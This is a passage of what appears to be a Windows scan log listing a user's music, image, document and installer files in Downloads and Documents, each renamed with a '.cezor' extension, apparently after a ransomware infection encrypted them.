    2019-07-09 15:36 - 2018-10-10 22:00 - 001756394 _____ C:\Users\ADMIN\Downloads\A Musical Matchmaking.pdf.cezor
    2019-07-09 15:36 - 2018-10-05 21:47 - 007255224 _____ C:\Users\ADMIN\Downloads\NCT Dream (엔시티 드림) - 'GO' Lyrics [Color CodedHanRomEng].mp4.cezor
    2019-07-09 15:36 - 2018-10-05 21:46 - 005361795 _____ C:\Users\ADMIN\Downloads\Clean Bandit - Solo feat. Demi Lovato [Official Video].mp3.cezor
    2019-07-09 15:36 - 2018-10-05 21:46 - 004957420 _____ C:\Users\ADMIN\Downloads\NCT Dream (엔시티 드림) - 'GO' Lyrics [Color CodedHanRomEng].mp3.cezor
    2019-07-09 15:36 - 2018-10-02 13:14 - 006940094 _____ C:\Users\ADMIN\Downloads\akali 2.jpg.cezor
    2019-07-09 15:36 - 2018-10-02 13:09 - 000044340 _____ C:\Users\ADMIN\Downloads\akali.jpg.cezor
    2019-07-09 15:36 - 2018-09-29 19:04 - 005076539 _____ C:\Users\ADMIN\Downloads\NCT U_WITHOUT YOU_Music Video.mp3.cezor
    2019-07-09 15:36 - 2018-09-29 19:03 - 005267128 _____ C:\Users\ADMIN\Downloads\NCT U 엔시티 유 일곱 번째 감각 (The 7th Sense) Performance Video.mp3.cezor
    2019-07-09 15:36 - 2018-09-29 19:02 - 005649561 _____ C:\Users\ADMIN\Downloads\NCT 127 (엔씨티 127) - Back 2 U (AM 0127) Colour Coded Lyrics (HanRomEng).mp3.cezor
    2019-07-09 15:36 - 2018-09-29 19:01 - 003813257 _____ C:\Users\ADMIN\Downloads\NCT 127 - Baby Dont Like It Lyrics [HANROMENG] + Color Coded.mp3.cezor
    2019-07-09 15:36 - 2018-09-29 19:00 - 004841437 _____ C:\Users\ADMIN\Downloads\NCT 127 - Whiplash Lyrics [HANROMENG] + Color Coded.mp3.cezor
    2019-07-09 15:36 - 2018-09-29 18:59 - 004930462 _____ C:\Users\ADMIN\Downloads\NCT 2018 엔시티 2018 Black on Black MV (Performance Ver.).mp3.cezor
    2019-07-09 15:36 - 2018-09-29 18:59 - 004751785 _____ C:\Users\ADMIN\Downloads\NCT DREAM (엔씨티 드림) - Drippin’ (드리핑) Color Coded HanRomEng Lyrics.mp3.cezor
    2019-07-09 15:36 - 2018-09-29 18:58 - 004449600 _____ C:\Users\ADMIN\Downloads\NCT DREAM 엔시티 드림 We Go Up MV.mp3.cezor
    2019-07-09 15:36 - 2018-09-29 18:57 - 004529221 _____ C:\Users\ADMIN\Downloads\NCT U 엔시티 유 Baby Dont Stop MV.mp3.cezor
    2019-07-09 15:36 - 2018-09-19 18:33 - 000176368 _____ C:\Users\ADMIN\Downloads\paper-lantern-festival-Florence.jpg.cezor
    2019-07-09 15:36 - 2018-09-19 18:30 - 000976809 _____ C:\Users\ADMIN\Downloads\NaughtyAffectionateAfricanharrierhawk-size_restricted.gif.cezor
    2019-07-09 15:36 - 2018-09-19 18:29 - 000048140 _____ C:\Users\ADMIN\Downloads\19120387_317071188730508_4209958283915558912_n.jpg.cezor
    2019-07-09 15:36 - 2018-09-19 18:24 - 000449632 _____ C:\Users\ADMIN\Downloads\download (25).png.cezor
    2019-07-09 15:36 - 2018-09-19 18:20 - 000422555 _____ C:\Users\ADMIN\Downloads\Bakugou.Katsuki.full.2131175.jpg.cezor
    2019-07-09 15:36 - 2018-09-15 15:21 - 001613150 _____ C:\Users\ADMIN\Downloads\attachments.zip.cezor
    2019-07-09 15:36 - 2018-09-15 15:21 - 001613150 _____ C:\Users\ADMIN\Downloads\attachments (1).zip.cezor
    2019-07-09 15:36 - 2018-09-12 12:14 - 070737139 _____ C:\Users\ADMIN\Downloads\IGdm-Setup-2.5.2.exe.cezor
    2019-07-09 15:36 - 2018-09-05 11:59 - 000520270 _____ C:\Users\ADMIN\Downloads\psychology-supp-reading-mat-xi.doc.cezor
    2019-07-09 15:36 - 2018-08-30 14:47 - 000027874 _____ C:\Users\ADMIN\Downloads\rbxfpsunlocker-1.5.zip.cezor
    2019-07-09 15:36 - 2018-08-30 14:44 - 000027617 _____ C:\Users\ADMIN\Downloads\rbxfpsunlocker-master.zip.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 005799399 _____ C:\Users\ADMIN\Documents\Nightcore - Clarity.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 005656457 _____ C:\Users\ADMIN\Documents\Maroon 5 - Girls Like You (Lyrics) ft. Cardi B.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 005601287 _____ C:\Users\ADMIN\Documents\Troye Sivan - Dance To This (Official Audio) ft. Ariana Grande.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 005450194 _____ C:\Users\ADMIN\Documents\Nightcore - Counting Stars.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 005417594 _____ C:\Users\ADMIN\Documents\Troye Sivan - Bloom (Lyric Video).mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 005312268 _____ C:\Users\ADMIN\Documents\Touch - Troye Sivan (Lyrics).mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 005090958 _____ C:\Users\ADMIN\Documents\BTS (방탄소년단) LOVE YOURSELF 轉 Tear Singularity Comeback Trailer.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 004685329 _____ C:\Users\ADMIN\Documents\Nightcore - Rather Be.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 004682821 _____ C:\Users\ADMIN\Documents\Nightcore - Centuries.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 004630158 _____ C:\Users\ADMIN\Documents\Nightcore - Angel With A Shotgun.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 004424522 _____ C:\Users\ADMIN\Documents\Nightcore - Stereo heart.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 004100395 _____ C:\Users\ADMIN\Documents\Nightcore - Hall of Fame.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 003902282 _____ C:\Users\ADMIN\Documents\Nightcore - Symphony - (Lyrics).mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 003615771 _____ C:\Users\ADMIN\Documents\Nightcore - Im Not Her - (Lyrics).mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 003372328 _____ C:\Users\ADMIN\Documents\BTS - I NEED U (Official Instrumental) +Karaoke.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 002159393 _____ C:\Users\ADMIN\Documents\My Hero Academia Season 3 – Opening Theme.mp3.cezor
    2019-07-09 15:36 - 2018-08-17 20:38 - 002446566 _____ C:\Users\ADMIN\Downloads\amazing.png.cezor
    2019-07-09 15:36 - 2018-08-17 13:04 - 184170574 _____ C:\Users\ADMIN\Downloads\nightcore havana despacito believer shape of you rockabye and more (switching vocal).mpeg.cezor
    2019-07-09 15:36 - 2018-08-11 23:39 - 000036418 _____ C:\Users\ADMIN\Downloads\large (2).jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:39 - 000018327 _____ C:\Users\ADMIN\Downloads\7c8403577d127a3ce33376d751ef318df190a1de_hq.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:33 - 000715638 _____ C:\Users\ADMIN\Downloads\dangan_ronpa_icons_by_crescentmarionette-d6n2lqt.png.cezor
    2019-07-09 15:36 - 2018-08-11 23:33 - 000691144 _____ C:\Users\ADMIN\Downloads\c0c.png.cezor
    2019-07-09 15:36 - 2018-08-11 23:32 - 000346448 _____ C:\Users\ADMIN\Downloads\junko_enoshima_dangan_ronpa_by_0kasane0-d6urram.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:30 - 000063189 _____ C:\Users\ADMIN\Downloads\C7ytx7nWkAEwzS1.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:19 - 000035129 _____ C:\Users\ADMIN\Downloads\6546cb72b6516fd307c141c0624517d9.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:18 - 000051597 _____ C:\Users\ADMIN\Downloads\92ca9da82e5223a0ca12654312ba8d4c--avatar-couple.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:18 - 000045010 _____ C:\Users\ADMIN\Downloads\3ed11f93e152079016e7aaef47ae2cd2.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:16 - 000034479 _____ C:\Users\ADMIN\Downloads\275b239b226fbe16d0c45634a5cc0f28.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:16 - 000032412 _____ C:\Users\ADMIN\Downloads\ad2240290ad6aeff1ac9e0d2f7527b40.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:02 - 000033899 _____ C:\Users\ADMIN\Downloads\large (1).jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:02 - 000032335 _____ C:\Users\ADMIN\Downloads\large.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:59 - 000040172 _____ C:\Users\ADMIN\Downloads\d90ee3a5f3a2aac1bcb067be427178e9.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:59 - 000034339 _____ C:\Users\ADMIN\Downloads\d49f626d64a0e038cf5d238110a54eef.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:58 - 000026139 _____ C:\Users\ADMIN\Downloads\78b24a6ce4bc55359906f360b6a9e27e.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:58 - 000019271 _____ C:\Users\ADMIN\Downloads\ce62c3803839bb5ac5565a1223ed1ccd.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:48 - 000038025 _____ C:\Users\ADMIN\Downloads\889993b50ee2b292addd9fe3adfe3d18.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:47 - 000052270 _____ C:\Users\ADMIN\Downloads\99b856213914717b296f0bc6bc13646f.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:47 - 000051158 _____ C:\Users\ADMIN\Downloads\618f09b71d7d0fe40dedb2b11bbd1605.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:47 - 000045971 _____ C:\Users\ADMIN\Downloads\1a2b491be5aef55a84795549d537067a.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:47 - 000044028 _____ C:\Users\ADMIN\Downloads\f144ccc45b303b4c6cde273186490a6b.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:43 - 000078871 _____ C:\Users\ADMIN\Downloads\80b0c202e95175d928147e79659f5842.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:42 - 000069178 _____ C:\Users\ADMIN\Downloads\0a2af99df78b5b46815fe3ccbd5ed5bb.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 18:51 - 055825658 _____ C:\Users\ADMIN\Downloads\BTS (방탄소년단) DNA Official MV.avi.cezor
    2019-07-09 15:36 - 2018-08-11 18:50 - 000157273 _____ C:\Users\ADMIN\Downloads\giphy.gif.cezor
    2019-07-09 15:36 - 2018-08-05 21:04 - 000048016 _____ C:\Users\ADMIN\Downloads\download (24).png.cezor
    2019-07-09 15:36 - 2018-08-03 18:13 - 004873411 _____ C:\Users\ADMIN\Downloads\(G)I-DLE (여자아이들) - LATATA (라타타) Lyrics [Color Coded_Han_Rom_Eng].mp3.cezor
    2019-07-09 15:36 - 2018-08-03 18:12 - 005656457 _____ C:\Users\ADMIN\Downloads\Maroon 5 - Girls Like You (Lyrics) ft. Cardi B.mp3.cezor
    2019-07-09 15:36 - 2018-08-03 18:10 - 002159393 _____ C:\Users\ADMIN\Downloads\My Hero Academia Season 3 – Opening Theme.mp3.cezor
    2019-07-09 15:36 - 2018-08-03 18:09 - 005461479 _____ C:\Users\ADMIN\Downloads\Ariana Grande ft. Nicki Minaj - Side To Side (Lyrics).mp3.cezor
    2019-07-09 15:36 - 2018-08-03 18:09 - 004926074 _____ C:\Users\ADMIN\Downloads\Ariana Grande - God is a woman (Lyric Video).mp3.cezor
    2019-07-09 15:36 - 2018-08-03 15:30 - 000121931 _____ C:\Users\ADMIN\Downloads\download (22).png.cezor
    2019-07-09 15:36 - 2018-08-03 15:30 - 000116146 _____ C:\Users\ADMIN\Downloads\download (21).png.cezor
    2019-07-09 15:36 - 2018-08-03 15:30 - 000064617 _____ C:\Users\ADMIN\Downloads\download (23).png.cezor
    2019-07-09 15:36 - 2018-07-30 15:18 - 000787568 _____ C:\Users\ADMIN\Downloads\download (20).png.cezor
    2019-07-09 15:36 - 2018-07-30 15:12 - 000149852 _____ C:\Users\ADMIN\Downloads\download (19).png.cezor
    2019-07-09 15:36 - 2018-07-30 15:08 - 000260880 _____ C:\Users\ADMIN\Downloads\download (18).png.cezor
    2019-07-09 15:36 - 2018-07-30 15:06 - 000486370 _____ C:\Users\ADMIN\Documents\lay.docx.cezor
    2019-07-09 15:36 - 2018-07-30 15:06 - 000154118 _____ C:\Users\ADMIN\Downloads\download (17).png.cezor
    2019-07-09 15:36 - 2018-07-30 15:01 - 000437839 _____ C:\Users\ADMIN\Downloads\5TpxWkLNZIN5uFaFmfGieHIih_X9FsSlpmD_RVineRY.jpg.cezor
    2019-07-09 15:36 - 2018-07-29 13:26 - 000147364 _____ C:\Users\ADMIN\Downloads\download (16).png.cezor
    2019-07-09 15:36 - 2018-07-29 13:24 - 000044559 _____ C:\Users\ADMIN\Downloads\download (15).png.cezor
    2019-07-09 15:36 - 2018-07-29 13:22 - 000043700 _____ C:\Users\ADMIN\Downloads\download (14).png.cezor
    2019-07-09 15:36 - 2018-07-25 20:43 - 000087559 _____ C:\Users\ADMIN\Downloads\download (13).png.cezor
    2019-07-09 15:36 - 2018-07-25 16:09 - 000622157 _____ C:\Users\ADMIN\Documents\BABY BOY.docx.cezor
    2019-07-09 15:36 - 2018-07-25 16:07 - 000082066 _____ C:\Users\ADMIN\Downloads\download (12).png.cezor
    2019-07-09 15:36 - 2018-07-25 16:06 - 000083211 _____ C:\Users\ADMIN\Downloads\download (11).png.cezor
    2019-07-09 15:36 - 2018-07-25 16:03 - 000091357 _____ C:\Users\ADMIN\Downloads\download (10).png.cezor
    2019-07-09 15:36 - 2018-07-25 16:02 - 000071378 _____ C:\Users\ADMIN\Downloads\download (9).png.cezor
    2019-07-09 15:36 - 2018-07-25 15:38 - 000009691 _____ C:\Users\ADMIN\Downloads\download (8).png.cezor
    2019-07-09 15:36 - 2018-07-25 15:26 - 000029201 _____ C:\Users\ADMIN\Downloads\8bit-aesthetics-blue-galaxy-Favim.com-3807349.jpg.cezor
    2019-07-09 15:36 - 2018-07-19 19:45 - 000548955 _____ C:\Users\ADMIN\Downloads\jesc105.pdf.cezor
    2019-07-09 15:36 - 2018-07-19 16:36 - 000822406 _____ C:\Users\ADMIN\Downloads\RobloxPlayerLauncher (6).exe.cezor
    2019-07-09 15:36 - 2018-07-19 16:34 - 000822406 _____ C:\Users\ADMIN\Downloads\RobloxPlayerLauncher (5).exe.cezor
    2019-07-09 15:36 - 2018-07-16 20:38 - 000078902 _____ C:\Users\ADMIN\Downloads\cf5db942ed46743260c9c7f4a30f28bb--yellow-art-yellow-walls.jpg.cezor
    2019-07-09 15:36 - 2018-07-16 20:37 - 000012874 _____ C:\Users\ADMIN\Downloads\3998c2fb76f538050fbda38fb987ed7b.jpg.cezor
    2019-07-09 15:36 - 2018-07-16 20:34 - 000022858 _____ C:\Users\ADMIN\Downloads\6e334765f5d8c8aea0d08420a127ca01.jpg.cezor
    2019-07-09 15:36 - 2018-07-16 20:32 - 000205056 _____ C:\Users\ADMIN\Downloads\large.png.cezor
    2019-07-09 15:36 - 2018-07-16 20:30 - 000064483 _____ C:\Users\ADMIN\Downloads\med_1484903818_image.jpg.cezor
    2019-07-09 15:36 - 2018-07-16 14:37 - 000148861 _____ C:\Users\ADMIN\Downloads\download (7).png.cezor
    2019-07-09 15:36 - 2018-07-16 14:36 - 000098594 _____ C:\Users\ADMIN\Documents\Doc2.docx.cezor
    2019-07-09 15:36 - 2018-07-16 14:11 - 000051694 _____ C:\Users\ADMIN\Downloads\download (6).png.cezor
    2019-07-09 15:36 - 2018-07-16 14:10 - 000100235 _____ C:\Users\ADMIN\Documents\きくらとかといち1.docx.cezor
    2019-07-09 15:36 - 2018-07-16 14:00 - 000017106 _____ C:\Users\ADMIN\Downloads\download (5).png.cezor
    2019-07-09 15:36 - 2018-07-16 13:49 - 000011961 _____ C:\Users\ADMIN\Documents\きくらとかといちり.docx.cezor
    2019-07-09 15:36 - 2018-07-16 13:19 - 000232157 _____ C:\Users\ADMIN\Documents\Doc1.docx.cezor
    2019-07-09 15:36 - 2018-07-16 13:13 - 000087365 _____ C:\Users\ADMIN\Downloads\DependableAshamedBrocketdeer-max-1mb.gif.cezor
    2019-07-09 15:36 - 2018-07-16 13:13 - 000065884 _____ C:\Users\ADMIN\Downloads\kawaii-transparent-pixel-art_183455.gif.cezor
    2019-07-09 15:36 - 2018-07-05 16:27 - 000822406 _____ C:\Users\ADMIN\Downloads\RobloxPlayerLauncher (4).exe.cezor
    2019-07-09 15:36 - 2018-07-04 17:01 - 000037256 _____ C:\Users\ADMIN\Downloads\fa78b24a59622545103399784a7d0e1d--wishing-well-poems-wishing-well-diy.jpg.cezor
    2019-07-09 15:36 - 2018-07-04 15:27 - 000822406 _____ C:\Users\ADMIN\Downloads\RobloxPlayerLauncher (3).exe.cezor
    2019-07-09 15:36 - 2018-07-04 15:24 - 000822406 _____ C:\Users\ADMIN\Downloads\RobloxPlayerLauncher (2).exe.cezor
    2019-07-09 15:36 - 2018-05-30 19:58 - 000000957 _____ C:\Users\ADMIN\Downloads\download (4).png.cezor
    2019-07-09 15:36 - 2018-05-30 19:57 - 000004071 _____ C:\Users\ADMIN\Downloads\download (3).png.cezor
    2019-07-09 15:36 - 2018-05-30 19:44 - 000053756 _____ C:\Users\ADMIN\Downloads\download (1).png.cezor
    2019-07-09 15:36 - 2018-05-30 19:44 - 000042012 _____ C:\Users\ADMIN\Downloads\download (2).png.cezor
    2019-07-09 15:36 - 2018-05-30 16:14 - 000300386 _____ C:\Users\ADMIN\Downloads\download.png.cezor
    2019-07-09 15:36 - 2018-05-20 16:35 - 000148611 _____ C:\Users\ADMIN\Downloads\Listen-I-Could-Go-You-Get-Point-Now-Right.jpg.cezor
    2019-07-09 15:36 - 2018-05-13 13:31 - 000004706 _____ C:\Users\ADMIN\Downloads\17352857_418896838459053_1963206290_n.jpg.cezor
    2019-07-09 15:36 - 2018-05-12 15:53 - 004685329 _____ C:\Users\ADMIN\Downloads\Nightcore - Rather Be.mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:52 - 004424522 _____ C:\Users\ADMIN\Downloads\Nightcore - Stereo heart.mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:50 - 005799399 _____ C:\Users\ADMIN\Downloads\Nightcore - Clarity.mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:50 - 005450194 _____ C:\Users\ADMIN\Downloads\Nightcore - Counting Stars.mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:49 - 004682821 _____ C:\Users\ADMIN\Downloads\Nightcore - Centuries.mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:48 - 004630158 _____ C:\Users\ADMIN\Downloads\Nightcore - Angel With A Shotgun.mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:46 - 004100395 _____ C:\Users\ADMIN\Downloads\Nightcore - Hall of Fame.mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:45 - 003902282 _____ C:\Users\ADMIN\Downloads\Nightcore - Symphony - (Lyrics).mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:43 - 003615771 _____ C:\Users\ADMIN\Downloads\Nightcore - Im Not Her - (Lyrics).mp3.cezor
    2019-07-09 15:36 - 2018-05-12 15:36 - 005090958 _____ C:\Users\ADMIN\Downloads\BTS (방탄소년단) LOVE YOURSELF 轉 Tear Singularity Comeback Trailer.mp3.cezor
    2019-07-09 15:36 - 2018-05-11 16:41 - 000023260 _____ C:\Users\ADMIN\Downloads\ff27e9d10225288881a08df9f7b263a0398edc5f_hq.jpg.cezor
    2019-07-09 15:36 - 2018-04-19 17:21 - 000003706 _____ C:\Users\ADMIN\Downloads\Ot9b06J.png.cezor
    2019-07-09 15:36 - 2018-04-16 15:41 - 000191749 _____ C:\Users\ADMIN\Downloads\kageyama-intimidating.png.cezor
    2019-07-09 15:36 - 2018-04-04 17:39 - 000372966 _____ C:\Users\ADMIN\Downloads\free_to_use_vines_and_plants_red_gem_divider_by_sinisterparakeet-dbug64s.png.cezor
    2019-07-09 15:36 - 2018-04-04 12:39 - 000081807 _____ C:\Users\ADMIN\Downloads\imageedit_1_5184723339.png.cezor
    2019-07-09 15:36 - 2018-03-29 16:53 - 005159662 _____ C:\Users\ADMIN\Downloads\Detection.exe.cezor
    2019-07-09 15:36 - 2018-03-29 13:23 - 075353102 _____ C:\Users\ADMIN\Downloads\InstallPaladins.exe.cezor
    2019-07-09 15:36 - 2018-03-09 20:43 - 000081776 _____ C:\Users\ADMIN\Downloads\oZe4FA95mwY.swf.cezor
    2019-07-09 15:36 - 2018-02-28 21:07 - 001129894 _____ C:\Users\ADMIN\Downloads\ChromeSetup.exe.cezor
    2019-07-09 15:36 - 2018-02-26 18:52 - 019981086 _____ C:\Users\ADMIN\Downloads\GTA_V_Launcher_1_0_1290_2 (1).exe.cezor
    2019-07-09 15:36 - 2018-02-25 17:32 - 029562471 _____ C:\Users\ADMIN\Downloads\Book (IT Level-1 New).pdf.cezor
    2019-07-09 15:36 - 2018-02-25 16:12 - 001519037 _____ C:\Users\ADMIN\Downloads\NVEQ SWB IT L1 U2 Funda of Computer.pdf11_04_2013_12_07_36.pdf.cezor
    2019-07-09 15:36 - 2018-02-18 12:39 - 019981086 _____ C:\Users\ADMIN\Downloads\GTA_V_Launcher_1_0_1290_2.exe.cezor
    2019-07-09 15:36 - 2018-02-10 16:49 - 001231570 _____ C:\Users\ADMIN\Downloads\katarina_wallpaper_by_katlynarts-d790bhc.png.cezor
    2019-07-09 15:36 - 2018-02-10 16:48 - 001257631 _____ C:\Users\ADMIN\Downloads\katarina-lol-girl-hd-wallpaper-1920x1200.jpg.cezor
    2019-07-09 15:36 - 2018-01-14 20:43 - 000947441 _____ C:\Users\ADMIN\Downloads\cGnMWZkjTJGzhGYmLzFecw (1).png.cezor
    2019-07-09 15:36 - 2018-01-13 12:38 - 000899368 _____ C:\Users\ADMIN\Downloads\libcrypto-1_1.zip.cezor
    2019-07-09 15:36 - 2017-12-10 13:28 - 000127744 _____ C:\Users\ADMIN\Downloads\DLxs3EOPQsecB89NdNEgcA.png.cezor
    2019-07-09 15:36 - 2017-12-10 13:28 - 000031961 _____ C:\Users\ADMIN\Downloads\EL_rPK2uREOWEVTqIcLEPw.png.cezor
    2019-07-09 15:36 - 2017-12-07 18:28 - 000108494 _____ C:\Users\ADMIN\Downloads\shadow.jpg.cezor
    2019-07-09 15:36 - 2017-11-21 17:26 - 000016555 _____ C:\Users\ADMIN\Documents\too old for toys.docx.cezor
    2019-07-09 15:36 - 2017-11-20 18:52 - 000014483 _____ C:\Users\ADMIN\Documents\A tiger for a pet.docx.cezor
    2019-07-09 15:36 - 2017-11-20 18:26 - 000019579 _____ C:\Users\ADMIN\Documents\isaac NEWTOn.docx.cezor
    2019-07-09 15:36 - 2017-11-12 20:21 - 000574802 _____ C:\Users\ADMIN\Downloads\cooooover.png.cezor
    2019-07-09 15:36 - 2017-11-12 20:20 - 000575609 _____ C:\Users\ADMIN\Downloads\coooover.png.cezor
    2019-07-09 15:36 - 2017-11-12 20:19 - 000681734 _____ C:\Users\ADMIN\Downloads\cooover.png.cezor
    2019-07-09 15:36 - 2017-11-12 20:16 - 000750450 _____ C:\Users\ADMIN\Downloads\coover.png.cezor
    2019-07-09 15:36 - 2017-11-12 19:16 - 000001963 _____ C:\Users\ADMIN\Downloads\hurtmold.regular.png.cezor
    2019-07-09 15:36 - 2017-11-12 19:12 - 000002710 _____ C:\Users\ADMIN\Downloads\expressway-free.regular.png.cezor
    2019-07-09 15:36 - 2017-11-12 19:09 - 000003402 _____ C:\Users\ADMIN\Downloads\dodge.dodge.png.cezor
    2019-07-09 15:36 - 2017-11-12 19:03 - 000007334 _____ C:\Users\ADMIN\Downloads\divider.png.cezor
    2019-07-09 15:36 - 2017-11-12 18:59 - 000006670 _____ C:\Users\ADMIN\Downloads\0e74c6c1949606bd43be7143b28a6de1.png.cezor
    2019-07-09 15:36 - 2017-11-12 18:58 - 000003088 _____ C:\Users\ADMIN\Downloads\d2b0905c18a898f49c9ea96704ff1429.png.cezor
    2019-07-09 15:36 - 2017-11-12 18:53 - 000014368 _____ C:\Users\ADMIN\Downloads\52b5d67727aa9542321899ea20790b1b.png.cezor
    2019-07-09 15:36 - 2017-11-12 18:50 - 000005582 _____ C:\Users\ADMIN\Downloads\4e185e2fbe92d3d6b0a99b0ee273fb46.png.cezor
    2019-07-09 15:36 - 2017-11-12 18:49 - 000009039 _____ C:\Users\ADMIN\Downloads\c012b0a1e6285032f9278ab399c92be7.png.cezor
    2019-07-09 15:36 - 2017-11-12 18:34 - 001178983 _____ C:\Users\ADMIN\Downloads\autumn-leaves-wallpapers-with-yellow-color-leaves-beautiful-autumn-wallpaper-for-interior-wall-decor-idea-fall-scenery-backgrounds-fall-leaves-desktop-wallpaper-free-autumn-desktop.jpg.cezor
    2019-07-09 15:36 - 2017-11-12 18:30 - 000090056 _____ C:\Users\ADMIN\Downloads\color-combo-17-tb-662x0.webp.cezor
    2019-07-09 15:36 - 2017-11-12 12:06 - 000370174 _____ C:\Users\ADMIN\Downloads\bokeh-lights-sunset-city-hd-wallpaper.jpg.cezor
    2019-07-09 15:36 - 2017-11-12 12:00 - 000326819 _____ C:\Users\ADMIN\Downloads\nature_insects_butterflies_gradient_1.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:53 - 001082328 _____ C:\Users\ADMIN\Downloads\523014911-floral-design-hi.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:48 - 000003566 _____ C:\Users\ADMIN\Downloads\libel-suit.regular (1).png.cezor
    2019-07-09 15:36 - 2017-11-12 11:46 - 000016830 _____ C:\Users\ADMIN\Downloads\ea2e470bbdc42d1256382353fc552459.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:45 - 000026780 _____ C:\Users\ADMIN\Downloads\97abb9ec0591ad8f91ba84faa9c4bb8e.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:42 - 000045464 _____ C:\Users\ADMIN\Downloads\coming-soon-fancy-gold-divider-top-of-page (1).png.cezor
    2019-07-09 15:36 - 2017-11-12 11:41 - 000004149 _____ C:\Users\ADMIN\Downloads\sg-alternative.high-alt.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:36 - 000011604 _____ C:\Users\ADMIN\Downloads\97ad3dc350d8eddc7ff38127168caab0.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:34 - 000011923 _____ C:\Users\ADMIN\Downloads\95ccf1284a5786b412fc36cbd0d5ea56.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:27 - 000045464 _____ C:\Users\ADMIN\Downloads\coming-soon-fancy-gold-divider-top-of-page.png.cezor
    2019-07-09 15:36 - 2017-11-12 11:27 - 000034979 _____ C:\Users\ADMIN\Downloads\divider (2).png.cezor
    2019-07-09 15:36 - 2017-11-12 11:27 - 000004490 _____ C:\Users\ADMIN\Downloads\Golden--divider.png.cezor
    2019-07-09 15:36 - 2017-11-09 17:14 - 000134168 _____ C:\Users\ADMIN\Downloads\scrollwork_10_gold_by_victorian_lady-dah7mex.png.cezor
    2019-07-09 15:36 - 2017-11-09 17:14 - 000085636 _____ C:\Users\ADMIN\Downloads\Gold-Border-Frame-Transparent-PNG.png.cezor
    2019-07-09 15:36 - 2017-11-09 17:14 - 000030752 _____ C:\Users\ADMIN\Downloads\fec1c7c3f2e4a3980ee5466dc7b96ed5.jpg.cezor
    2019-07-09 15:36 - 2017-11-09 17:13 - 000092835 _____ C:\Users\ADMIN\Downloads\gold-cool-border-hi.png.cezor
    2019-07-09 15:36 - 2017-11-09 17:11 - 002242906 _____ C:\Users\ADMIN\Downloads\4d1442bd6c1ab961e1fdb99498c10bfc.jpg.cezor
    2019-07-09 15:36 - 2017-11-08 18:01 - 000001369 _____ C:\Users\ADMIN\Downloads\promo-gradient-border.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:57 - 000408564 _____ C:\Users\ADMIN\Downloads\Blue-Border-Frame-Transparent-PNG.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:57 - 000172928 _____ C:\Users\ADMIN\Downloads\Light-blue-artistic-loop-triangle-rectangular-powerpoint-border.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:55 - 000014398 _____ C:\Users\ADMIN\Downloads\457824793.jpg.cezor
    2019-07-09 15:36 - 2017-11-08 17:38 - 000002183 _____ C:\Users\ADMIN\Downloads\neuropolitical.regular.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:33 - 000022210 _____ C:\Users\ADMIN\Downloads\f0c0efae129388d51aaa437447be577c.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:33 - 000017744 _____ C:\Users\ADMIN\Downloads\e4fd3334856cef20457d35524a54a025.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:32 - 000038231 _____ C:\Users\ADMIN\Downloads\340eb86b4460abb695f6b7f8a3ca5527.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:26 - 000004718 _____ C:\Users\ADMIN\Downloads\pakenham-free.regular (1).png.cezor
    2019-07-09 15:36 - 2017-11-08 17:24 - 000004045 _____ C:\Users\ADMIN\Downloads\pakenham-free.regular.png.cezor
